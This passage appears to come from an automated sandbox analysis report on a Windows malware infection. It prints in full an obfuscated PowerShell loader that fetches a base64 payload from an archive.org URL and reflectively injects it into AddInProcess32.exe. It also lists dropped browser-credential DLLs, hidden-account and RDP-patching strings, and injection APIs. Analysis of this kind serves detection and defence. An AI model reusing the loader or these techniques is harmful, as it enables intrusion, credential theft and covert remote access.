2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,5_2_004060B0
              Source: msvcp140.dll.5.drStatic PE information: section name: .didat
              Source: mozglue.dll.5.drStatic PE information: section name: .didat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7BFEC00BD pushad ; iretd 2_2_00007FF7BFEC00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFEE00BD pushad ; iretd 4_2_00007FF7BFEE00C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_004011C0 push eax; ret 5_2_004011D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_004011C0 push eax; ret 5_2_004011FC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0041C225 pushad ; retn 0041h5_2_0041C22D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_004174D1 push ebp; retf 5_2_00417584
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00417570 push ebp; retf 5_2_00417584
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,5_2_0040D2B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040290E URLDownloadToFileW,ShellExecuteW,5_2_0040290E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Temp\nss3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Temp\softokn3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Temp\vcruntime140.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Temp\freebl3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Temp\msvcp140.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Temp\mozglue.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,5_2_0040A36F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,5_2_00409E2D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0040D3A8

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: powershell.exe, 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: powershell.exe, 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: AddInProcess32.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: AddInProcess32.exe, 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: AddInProcess32.exe, 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
